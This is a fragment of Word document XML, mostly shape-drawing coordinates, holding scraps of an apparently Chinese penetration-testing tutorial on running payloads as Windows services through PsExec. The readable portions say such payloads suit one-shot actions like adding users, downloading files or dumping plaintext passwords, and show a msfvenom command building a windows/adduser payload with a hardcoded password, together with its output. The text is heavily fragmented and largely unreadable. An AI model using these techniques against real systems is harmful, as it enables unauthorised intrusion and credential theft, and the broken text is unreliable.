    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:593.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,11870" coordsize="130,250">
        <v:shape style="position:absolute;left:2070;top:11870;width:130;height:250" coordorigin="2070,11870" coordsize="130,250" path="m2095,11880l2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2096,11880,2096,11880,2096,11880,2096,11880,2096,11880,2096,11880,2096,11880,2096,11880,2096,11880,2097,11880,2097,11880,2097,11880,2097,11880,2097,11880,2098,11880,2098,11880,2098,11880,2098,11880,2099,11880,2099,11880,2099,11880,2100,11880,2100,11880,2100,11880,2101,11880,2101,11880,2102,11880,2102,11880,2102,11880,2103,11880,2103,11880,2104,11880,2105,11880,2105,11880,2106,11880,2106,11880,2107,11880,2108,11880,2108,11880,2109,11880,2110,11880,2110,11880,2111,11880,2112,11880,2113,11880,2114,11880,2115,11880,2116,11880,2116,11880,2117,11880,2118,11880,2119,11880,2121,11880,2122,11880,2123,11880,2124,11880,2125,11880,2126,11880,2128,11880,2129,11880,2130,11880,2132,11880,2133,11880,2134,11880,2136,11880,2137,11880,2139,11880,2140,11880,2142,11880,2144,11880,2145,11880,2147,11880,2149,11880,2151,11880,2152,11880,2154,11880,2156,11880,2158,11880,2160,11880,2162,11880,2164,11880,2166,11880,2168,11880,2171,11880,2173,11880,2175,11880,2178,11880,2180,11880,2182,11880,2185,11880,2187,11880,2190,11880,2192,11880,2195,11880,2198,11880,2201,11880,2203,11880,2206,11880,2209,11880,2212,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11881,2215,11881,2215,11881,2215,11881,2215,11881,2215,11881,2215,11882,2215,11882,2215,11882,2215,11882,2215,11883,2215,11883,2215,11883,2215,11884,2215,11884,2215,11884,2215,11885,2215,11885,2215,11886,2215,11886,2215,11887,2215,11888,2215,11888,2215,11889,2215,11890,2215,11890,2215,11891,2215,11892,2215,11893,2215,11894,2215,11895,2215,11896,2215,11897,2215,11898,2215,11899,2215,11900,2215,11901,2215,11903,2215,11904,2215,11905,2215,11907,2215,11908,2215,11910,2215,11911,2215,11913,2215,11914,2215,11916,2215,11918,2215,11920,2215,11922,2215,11924,2215,11926,2215,11928,2215,11930,2215,11932,2215,11934,2215,11936,2215,11939,2215,11941,2215,11944,2215,11946,2215,11949,2215,11952,2215,11955,2215,11958,2215,11960,2215,11963,2215,11967,2215,11970,2215,11973,2215,11976,2215,11980,2215,11983,2215,11987,2215,11990,2215,11994,2215,11998,2215,12002,2215,12006,2215,12010,2215,12014,2215,12018,2215,12022,2215,12027,2215,12031,2215,12036,2215,12041,2215,12045,2215,12050,2215,12055,2215,12060,2215,12065,2215,12071,2215,12076,2215,12081,2215,12087,2215,12093,2215,12098,2215,12104,2215,12110,2215,12116,2215,12122,2215,12129,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2214,12135,2214,12135,2214,12135,2214,12135,2214,12135,2214,12135,2214,12135,2214,12135,2213,12135,2213,12135,2213,12135,2213,12135,2213,12135,2212,12135,2212,12135,2212,12135,2212,12135,2211,12135,2211,12135,2211,12135,2210,12135,2210,12135,2209,12135,2209,12135,2209,12135,2208,12135,2208,12135,2207,12135,2207,12135,2206,12135,2206,12135,2205,12135,2205,12135,2204,12135,2203,12135,2203,12135,2202,12135,2201,12135,2200,12135,2200,12135,2199,12135,2198,12135,2197,12135,2196,12135,2196,12135,2195,12135,2194,12135,2193,12135,2192,12135,2191,12135,2190,12135,2189,12135,2187,12135,2186,12135,2185,12135,2184,12135,2183,12135,2181,12135,2180,12135,2179,12135,2177,12135,2176,12135,2174,12135,2173,12135,2171,12135,2170,12135,2168,12135,2167,12135,2165,12135,2163,12135,2161,12135,2160,12135,2158,12135,2156,12135,2154,12135,2152,12135,2150,12135,2148,12135,2146,12135,2144,12135,2142,12135,2140,12135,2137,12135,2135,12135,2133,12135,2130,12135,2128,12135,2125,12135,2123,12135,2120,12135,2118,12135,2115,12135,2112,12135,2110,12135,2107,12135,2104,12135,2101,12135,2098,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12134,2095,12134,2095,12134,2095,12134,2095,12134,2095,12134,2095,12134,2095,12133,2095,12133,2095,12133,2095,12132,2095,12132,2095,12132,2095,12131,2095,12131,2095,12131,2095,12130,2095,12130,2095,12129,2095,12129,2095,12128,2095,12127,2095,12127,2095,12126,2095,12125,2095,12125,2095,12124,2095,12123,2095,12122,2095,12121,2095,12120,2095,12119,2095,12118,2095,12117,2095,12116,2095,12115,2095,12114,2095,12113,2095,12111,2095,12110,2095,12109,2095,12107,2095,12106,2095,12104,2095,12102,2095,12101,2095,12099,2095,12097,2095,12095,2095,12094,2095,12092,2095,12090,2095,12088,2095,12085,2095,12083,2095,12081,2095,12079,2095,12076,2095,12074,2095,12071,2095,12069,2095,12066,2095,12063,2095,12060,2095,12058,2095,12055,2095,12052,2095,12049,2095,12045,2095,12042,2095,12039,2095,12035,2095,12032,2095,12028,2095,12025,2095,12021,2095,12017,2095,12013,2095,12009,2095,12005,2095,12001,2095,11997,2095,11993,2095,11988,2095,11984,2095,11979,2095,11974,2095,11970,2095,11965,2095,11960,2095,11955,2095,11950,2095,11944,2095,11939,2095,11934,2095,11928,2095,11922,2095,11917,2095,11911,2095,11905,2095,11899,2095,11893,2095,11886,2095,11880e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:624.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,12490" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:12490;width:130;height:270" coordorigin="2070,12490" coordsize="130,270" path="m2095,12510l2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2096,12510,2096,12510,2096,12510,2096,12510,2096,12510,2096,12510,2096,12510,2096,12510,2096,12510,2097,12510,2097,12510,2097,12510,2097,12510,2097,12510,2098,12510,2098,12510,2098,12510,2098,12510,2099,12510,2099,12510,2099,12510,2100,12510,2100,12510,2100,12510,2101,12510,2101,12510,2102,12510,2102,12510,2102,12510,2103,12510,2103,12510,2104,12510,2105,12510,2105,12510,2106,12510,2106,12510,2107,12510,2108,12510,2108,12510,2109,12510,2110,12510,2110,12510,2111,12510,2112,12510,2113,12510,2114,12510,2115,12510,2116,12510,2116,12510,2117,12510,2118,12510,2119,12510,2121,12510,2122,12510,2123,12510,2124,12510,2125,12510,2126,12510,2128,12510,2129,12510,2130,12510,2132,12510,2133,12510,2134,12510,2136,12510,2137,12510,2139,12510,2140,12510,2142,12510,2144,12510,2145,12510,2147,12510,2149,12510,2151,12510,2152,12510,2154,12510,2156,12510,2158,12510,2160,12510,2162,12510,2164,12510,2166,12510,2168,12510,2171,12510,2173,12510,2175,12510,2178,12510,2180,12510,2182,12510,2185,12510,2187,12510,2190,12510,2192,12510,2195,12510,2198,12510,2201,12510,2203,12510,2206,12510,2209,12510,2212,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12511,2215,12511,2215,12511,2215,12511,2215,12511,2215,12511,2215,12511,2215,12511,2215,12511,2215,12512,2215,12512,2215,12512,2215,12512,2215,12512,2215,12513,2215,12513,2215,12513,2215,12514,2215,12514,2215,12514,2215,12515,2215,12515,2215,12516,2215,12516,2215,12517,2215,12517,2215,12518,2215,12519,2215,12519,2215,12520,2215,12521,2215,12522,2215,12522,2215,12523,2215,12524,2215,12525,2215,12526,2215,12527,2215,12528,2215,12529,2215,12530,2215,12532,2215,12533,2215,12534,2215,12535,2215,12537,2215,12538,2215,12540,2215,12541,2215,12543,2215,12545,2215,12546,2215,12548,2215,12550,2215,12552,2215,12554,2215,12556,2215,12558,2215,12560,2215,12562,2215,12564,2215,12567,2215,12569,2215,12572,2215,12574,2215,12577,2215,12579,2215,12582,2215,12585,2215,12588,2215,12591,2215,12594,2215,12597,2215,12600,2215,12603,2215,12607,2215,12610,2215,12613,2215,12617,2215,12621,2215,12624,2215,12628,2215,12632,2215,12636,2215,12640,2215,12644,2215,12648,2215,12653,2215,12657,2215,12662,2215,12666,2215,12671,2215,12676,2215,12681,2215,12686,2215,12691,2215,12696,2215,12701,2215,12706,2215,12712,2215,12717,2215,12723,2215,12729,2215,12735,2215,12741,2215,12747,2215,12753,2215,12759,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2214,12765,2214,12765,2214,12765,2214,12765,2214,12765,2214,12765,2214,12765,2214,12765,2213,12765,2213,12765,2213,12765,2213,12765,2213,12765,2212,12765,2212,12765,2212,12765,2212,12765,2211,12765,2211,12765,2211,12765,2210,12765,2210,12765,2209,12765,2209,12765,2209,12765,2208,12765,2208,12765,2207,12765,2207,12765,2206,12765,2206,12765,2205,12765,2205,12765,2204,12765,2203,12765,2203,12765,2202,12765,2201,12765,2200,12765,2200,12765,2199,12765,2198,12765,2197,12765,2196,12765,2196,12765,2195,12765,2194,12765,2193,12765,2192,12765,2191,12765,2190,12765,2189,12765,2187,12765,2186,12765,2185,12765,2184,12765,2183,12765,2181,12765,2180,12765,2179,12765,2177,12765,2176,12765,2174,12765,2173,12765,2171,12765,2170,12765,2168,12765,2167,12765,2165,12765,2163,12765,2161,12765,2160,12765,2158,12765,2156,12765,2154,12765,2152,12765,2150,12765,2148,12765,2146,12765,2144,12765,2142,12765,2140,12765,2137,12765,2135,12765,2133,12765,2130,12765,2128,12765,2125,12765,2123,12765,2120,12765,2118,12765,2115,12765,2112,12765,2110,12765,2107,12765,2104,12765,2101,12765,2098,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12764,2095,12764,2095,12764,2095,12764,2095,12764,2095,12763,2095,12763,2095,12763,2095,12762,2095,12762,2095,12762,2095,12761,2095,12761,2095,12760,2095,12760,2095,12759,2095,12759,2095,12758,2095,12758,2095,12757,2095,12756,2095,12756,2095,12755,2095,12754,2095,12753,2095,12753,2095,12752,2095,12751,2095,12750,2095,12749,2095,12748,2095,12747,2095,12745,2095,12744,2095,12743,2095,12742,2095,12740,2095,12739,2095,12737,2095,12736,2095,12734,2095,12733,2095,12731,2095,12729,2095,12728,2095,12726,2095,12724,2095,12722,2095,12720,2095,12718,2095,12716,2095,12714,2095,12711,2095,12709,2095,12707,2095,12704,2095,12702,2095,12699,2095,12696,2095,12694,2095,12691,2095,12688,2095,12685,2095,12682,2095,12679,2095,12676,2095,12672,2095,12669,2095,12666,2095,12662,2095,12659,2095,12655,2095,12651,2095,12648,2095,12644,2095,12640,2095,12636,2095,12631,2095,12627,2095,12623,2095,12619,2095,12614,2095,12609,2095,12605,2095,12600,2095,12595,2095,12590,2095,12585,2095,12580,2095,12575,2095,12569,2095,12564,2095,12558,2095,12553,2095,12547,2095,12541,2095,12535,2095,12529,2095,12523,2095,12517,2095,12510e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:163.500pt;margin-top:643.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3270,12870" coordsize="250,270">
        <v:shape style="position:absolute;left:3270;top:12870;width:250;height:270" coordorigin="3270,12870" coordsize="250,270" path="m3296,12885l3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3297,12885,3297,12885,3297,12885,3297,12885,3297,12885,3298,12885,3298,12885,3298,12885,3298,12885,3299,12885,3299,12885,3300,12885,3300,12885,3300,12885,3301,12885,3301,12885,3302,12885,3302,12885,3303,12885,3303,12885,3304,12885,3305,12885,3305,12885,3306,12885,3307,12885,3308,12885,3309,12885,3310,12885,3310,12885,3311,12885,3312,12885,3313,12885,3315,12885,3316,12885,3317,12885,3318,12885,3319,12885,3321,12885,3322,12885,3323,12885,3325,12885,3326,12885,3328,12885,3330,12885,3331,12885,3333,12885,3335,12885,3337,12885,3339,12885,3340,12885,3342,12885,3345,12885,3347,12885,3349,12885,3351,12885,3353,12885,3356,12885,3358,12885,3361,12885,3363,12885,3366,12885,3369,12885,3371,12885,3374,12885,3377,12885,3380,12885,3383,12885,3386,12885,3389,12885,3393,12885,3396,12885,3400,12885,3403,12885,3407,12885,3410,12885,3414,12885,3418,12885,3422,12885,3426,12885,3430,12885,3434,12885,3438,12885,3442,12885,3447,12885,3451,12885,3456,12885,3461,12885,3465,12885,3470,12885,3475,12885,3480,12885,3485,12885,3491,12885,3496,12885,3501,12885,3507,12885,3512,12885,3518,12885,3524,12885,3530,12885,3536,12885,3536,12885,3536,12885,3536,12885,3536,12885,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12887,3536,12887,3536,12887,3536,12887,3536,12887,3536,12888,3536,12888,3536,12888,3536,12888,3536,12889,3536,12889,3536,12890,3536,12890,3536,12890,3536,12891,3536,12891,3536,12892,3536,12893,3536,12893,3536,12894,3536,12894,3536,12895,3536,12896,3536,12897,3536,12898,3536,12898,3536,12899,3536,12900,3536,12901,3536,12902,3536,12903,3536,12904,3536,12906,3536,12907,3536,12908,3536,12909,3536,12911,3536,12912,3536,12914,3536,12915,3536,12917,3536,12918,3536,12920,3536,12922,3536,12923,3536,12925,3536,12927,3536,12929,3536,12931,3536,12933,3536,12935,3536,12937,3536,12940,3536,12942,3536,12944,3536,12947,3536,12949,3536,12952,3536,12955,3536,12957,3536,12960,3536,12963,3536,12966,3536,12969,3536,12972,3536,12975,3536,12978,3536,12982,3536,12985,3536,12989,3536,12992,3536,12996,3536,13000,3536,13003,3536,13007,3536,13011,3536,13015,3536,13019,3536,13024,3536,13028,3536,13032,3536,13037,3536,13041,3536,13046,3536,13051,3536,13056,3536,13061,3536,13066,3536,13071,3536,13076,3536,13082,3536,13087,3536,13093,3536,13098,3536,13104,3536,13110,3536,13116,3536,13122,3536,13128,3536,13134,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3535,13141,3535,13141,3535,13141,3535,13141,3535,13141,3535,13141,3535,13141,3535,13141,3534,13141,3534,13141,3534,13141,3534,13141,3534,13141,3533,13141,3533,13141,3533,13141,3532,13141,3532,13141,3532,13141,3531,13141,3531,13141,3530,13141,3530,13141,3529,13141,3529,13141,3528,13141,3527,13141,3527,13141,3526,13141,3525,13141,3524,13141,3524,13141,3523,13141,3522,13141,3521,13141,3520,13141,3519,13141,3518,13141,3517,13141,3516,13141,3515,13141,3513,13141,3512,13141,3511,13141,3509,13141,3508,13141,3507,13141,3505,13141,3503,13141,3502,13141,3500,13141,3498,13141,3497,13141,3495,13141,3493,13141,3491,13141,3489,13141,3487,13141,3485,13141,3483,13141,3480,13141,3478,13141,3476,13141,3473,13141,3471,13141,3468,13141,3466,13141,3463,13141,3460,13141,3457,13141,3454,13141,3451,13141,3448,13141,3445,13141,3442,13141,3439,13141,3435,13141,3432,13141,3428,13141,3425,13141,3421,13141,3417,13141,3414,13141,3410,13141,3406,13141,3402,13141,3398,13141,3393,13141,3389,13141,3385,13141,3380,13141,3375,13141,3371,13141,3366,13141,3361,13141,3356,13141,3351,13141,3346,13141,3341,13141,3336,13141,3330,13141,3325,13141,3319,13141,3313,13141,3308,13141,3302,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13140,3296,13140,3296,13140,3296,13140,3296,13140,3296,13140,3296,13140,3296,13140,3296,13140,3296,13140,3296,13139,3296,13139,3296,13139,3296,13139,3296,13139,3296,13138,3296,13138,3296,13138,3296,13137,3296,13137,3296,13137,3296,13136,3296,13136,3296,13135,3296,13135,3296,13134,3296,13134,3296,13133,3296,13132,3296,13132,3296,13131,3296,13130,3296,13129,3296,13129,3296,13128,3296,13127,3296,13126,3296,13125,3296,13124,3296,13123,3296,13122,3296,13121,3296,13119,3296,13118,3296,13117,3296,13115,3296,13114,3296,13113,3296,13111,3296,13110,3296,13108,3296,13106,3296,13105,3296,13103,3296,13101,3296,13099,3296,13097,3296,13095,3296,13093,3296,13091,3296,13089,3296,13086,3296,13084,3296,13082,3296,13079,3296,13077,3296,13074,3296,13072,3296,13069,3296,13066,3296,13063,3296,13060,3296,13057,3296,13054,3296,13051,3296,13048,3296,13044,3296,13041,3296,13037,3296,13034,3296,13030,3296,13027,3296,13023,3296,13019,3296,13015,3296,13011,3296,13007,3296,13002,3296,12998,3296,12994,3296,12989,3296,12985,3296,12980,3296,12975,3296,12970,3296,12965,3296,12960,3296,12955,3296,12950,3296,12945,3296,12939,3296,12934,3296,12928,3296,12922,3296,12916,3296,12910,3296,12904,3296,12898,3296,12892,3296,1288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机端口变化如下：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虽</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>报错，但并不影响执行。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注意：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75" w:firstLine="483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Psexec创建一个服务后，来运行可执行文件（如Micropoor.exe）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。但是将可执行文件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作为服务，payload必须接受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来自控制管理器的命令，否则将会执行失败。而psexec创建服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务后，将随之停止，该paylo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ad处于挂起模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1358" w:firstLine="483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参考该服务源码：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://github.com/rapid7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/metasploit-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framework/blob/master/data/templates/src/pe/exe/service/service.c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，p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayload启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>将会在过一段时间内退出。并强制终止。</w:t>
      </w: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383838"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>故该参数一般用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>adduser。配合adduser_payload。或者配合一次性执行完毕非常连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4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>接的paylo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ad。如下载。抓明文密码等。不适合需长连接通信的payload。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msfvenom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windows/adduser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PASS=Micropoor$123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USER=Mi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&gt;adduser.exe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platform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was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selected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choosing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Msf::Module::Platform::Windows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arch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selected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selecting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arch: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x86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encoder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badchars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specified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outputting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raw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size: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279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bytes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63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Final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size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file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73802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19.500pt;width:0.500pt;height:461.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,4390" coordsize="10,9230">
        <v:shape style="position:absolute;left:10390;top:4390;width:10;height:9230" coordorigin="10390,4390" coordsize="10,9230" path="m10402,4406l10402,4406,10402,4406,10402,4406,10402,4406,10402,4407,10402,4407,10402,4407,10402,4408,10402,4409,10402,4410,10402,4412,10402,4413,10402,4416,10402,4418,10402,4421,10402,4425,10402,4429,10402,4433,10402,4438,10402,4444,10402,4450,10402,4457,10402,4464,10402,4473,10402,4482,10402,4492,10402,4502,10402,4514,10402,4526,10402,4540,10402,4554,10402,4569,10402,4585,10402,4603,10402,4621,10402,4641,10402,4661,10402,4683,10402,4706,10402,4731,10402,4756,10402,4783,10402,4811,10402,4841,10402,4872,10402,4905,10402,4938,10402,4974,10402,5011,10402,5050,10402,5090,10402,5132,10402,5175,10402,5220,10402,5267,10402,5316,10402,5367,10402,5419,10402,5473,10402,5529,10402,5587,10402,5647,10402,5709,10402,5774,10402,5840,10402,5908,10402,5978,10402,6051,10402,6126,10402,6203,10402,6282,10402,6363,10402,6447,10402,6533,10402,6622,10402,6713,10402,6807,10402,6903,10402,7001,10402,7102,10402,7206,10402,7312,10402,7421,10402,7533,10402,7647,10402,7764,10402,7884,10402,8007,10402,8133,10402,8261,10402,8392,10402,8527,10402,8664,10402,8805,10402,8948,10402,9094,10402,9244,10402,9397,10402,9553,10402,9712,10402,9874,10402,10040,10402,10209,10402,10381,10402,10557,10402,10736,10402,10919,10402,11105,10402,11294,10402,11488,10402,11684,10402,11885,10402,12089,10402,12296,10402,12507,10402,12723,10402,12941,10402,13164,10402,13391,10402,13621e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:219.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,4390" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:4390;width:8990;height:390" coordorigin="1490,4390" coordsize="8990,390" path="m1510,4406l1510,4406,1510,4406,1510,4406,1510,4406,1510,4406,1510,4406,1511,4406,1512,4406,1512,4406,1514,4406,1515,4406,1517,4406,1519,4406,1521,4406,1524,4406,1528,4406,1532,4406,1536,4406,1541,4406,1546,4406,1552,4406,1559,4406,1566,4406,1575,4406,1583,4406,1593,4406,1603,4406,1615,4406,1627,4406,1640,4406,1654,4406,1668,4406,1684,4406,1701,4406,1719,4406,1738,4406,1758,4406,1780,4406,1802,4406,1826,4406,1851,4406,1877,4406,1904,4406,1933,4406,1963,4406,1995,4406,2028,4406,2063,4406,2099,4406,2136,4406,2175,4406,2216,4406,2259,4406,2303,4406,2348,4406,2396,4406,2445,4406,2496,4406,2549,4406,2604,4406,2660,4406,2719,4406,2779,4406,2841,4406,2906,4406,2972,4406,3041,4406,3112,4406,3184,4406,3259,4406,3336,4406,3416,4406,3498,4406,3582,4406,3668,4406,3757,4406,3848,4406,3941,4406,4037,4406,4136,4406,4236,4406,4340,4406,4446,4406,4555,4406,4666,4406,4780,4406,4897,4406,5017,4406,5139,4406,5264,4406,5392,4406,5523,4406,5657,4406,5793,4406,5933,4406,6076,4406,6222,4406,6370,4406,6522,4406,6677,4406,6835,4406,6997,4406,7161,4406,7329,4406,7500,4406,7675,4406,7853,4406,8034,4406,8219,4406,8407,4406,8598,4406,8793,4406,8992,4406,9194,4406,9400,4406,9609,4406,9823,4406,10039,4406,10260,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4407,10484,4407,10484,4407,10484,4407,10484,4407,10484,4407,10484,4407,10484,4408,10484,4408,10484,4408,10484,4408,10484,4409,10484,4409,10484,4409,10484,4410,10484,4410,10484,4411,10484,4411,10484,4412,10484,4412,10484,4413,10484,4414,10484,4415,10484,4415,10484,4416,10484,4417,10484,4418,10484,4419,10484,4420,10484,4421,10484,4422,10484,4423,10484,4425,10484,4426,10484,4427,10484,4429,10484,4430,10484,4432,10484,4433,10484,4435,10484,4437,10484,4439,10484,4441,10484,4443,10484,4445,10484,4447,10484,4449,10484,4451,10484,4454,10484,4456,10484,4459,10484,4461,10484,4464,10484,4467,10484,4470,10484,4473,10484,4476,10484,4479,10484,4482,10484,4486,10484,4489,10484,4493,10484,4496,10484,4500,10484,4504,10484,4508,10484,4512,10484,4516,10484,4520,10484,4525,10484,4529,10484,4534,10484,4539,10484,4543,10484,4548,10484,4553,10484,4559,10484,4564,10484,4569,10484,4575,10484,4581,10484,4587,10484,4592,10484,4599,10484,4605,10484,4611,10484,4618,10484,4624,10484,4631,10484,4638,10484,4645,10484,4652,10484,4659,10484,4667,10484,4674,10484,4682,10484,4690,10484,4698,10484,4706,10484,4714,10484,4723,10484,4732,10484,4740,10484,4749,10484,4758,10484,4768,10484,4777,10484,4787,10484,4796,10484,4796,10484,4796,10484,4796,10484,4796,10484,4796,10484,4796,10483,4796,10482,4796,10482,4796,10480,4796,10479,4796,10477,4796,10475,4796,10473,4796,10470,4796,10466,4796,10462,4796,10458,4796,10453,4796,10448,4796,10442,4796,10435,4796,10428,4796,10419,4796,10411,4796,10401,4796,10391,4796,10379,4796,10367,4796,10354,4796,10340,4796,10326,4796,10310,4796,10293,4796,10275,4796,10256,4796,10236,4796,10215,4796,10192,4796,10168,4796,10143,4796,10117,4796,10090,4796,10061,4796,10031,4796,9999,4796,9966,4796,9931,4796,9895,4796,9858,4796,9819,4796,9778,4796,9735,4796,9691,4796,9646,4796,9598,4796,9549,4796,9498,4796,9445,4796,9391,4796,9334,4796,9275,4796,9215,4796,9153,4796,9088,4796,9022,4796,8953,4796,8883,4796,8810,4796,8735,4796,8658,4796,8578,4796,8497,4796,8413,4796,8326,4796,8238,4796,8146,4796,8053,4796,7957,4796,7859,4796,7758,4796,7654,4796,7548,4796,7439,4796,7328,4796,7214,4796,7097,4796,6977,4796,6855,4796,6730,4796,6602,4796,6471,4796,6337,4796,6201,4796,6061,4796,5918,4796,5773,4796,5624,4796,5472,4796,5317,4796,5159,4796,4997,4796,4833,4796,4665,4796,4494,4796,4319,4796,4141,4796,3960,4796,3776,4796,3587,4796,3396,4796,3201,4796,3002,4796,2800,4796,2594,4796,2385,4796,2172,4796,1955,4796,1734,4796,1510,4796,1510,4796,1510,4796,1510,4796,1510,4796,1510,4796,1510,4796,1510,4796,1510,4796,1510,4796,1510,4796,1510,4796,1510,4796,1510,4796,1510,4796,1510,4796,1510,4796,1510,4795,1510,4795,1510,4795,1510,4795,1510,4795,1510,4794,1510,4794,1510,4794,1510,4793,1510,4793,1510,4792,1510,4792,1510,4791,1510,4791,1510,4790,1510,4790,1510,4789,1510,4788,1510,4787,1510,4786,1510,4786,1510,4785,1510,4784,1510,4783,1510,4782,1510,4780,1510,4779,1510,4778,1510,4777,1510,4775,1510,4774,1510,4772,1510,4771,1510,4769,1510,4767,1510,4766,1510,4764,1510,4762,1510,4760,1510,4758,1510,4756,1510,4754,1510,4751,1510,4749,1510,4746,1510,4744,1510,4741,1510,4739,1510,4736,1510,4733,1510,4730,1510,4727,1510,4724,1510,4720,1510,4717,1510,4714,1510,4710,1510,4706,1510,4703,1510,4699,1510,4695,1510,4691,1510,4687,1510,4682,1510,4678,1510,4673,1510,4669,1510,4664,1510,4659,1510,4654,1510,4649,1510,4644,1510,4639,1510,4633,1510,4628,1510,4622,1510,4616,1510,4610,1510,4604,1510,4598,1510,4592,1510,4585,1510,4578,1510,4572,1510,4565,1510,4558,1510,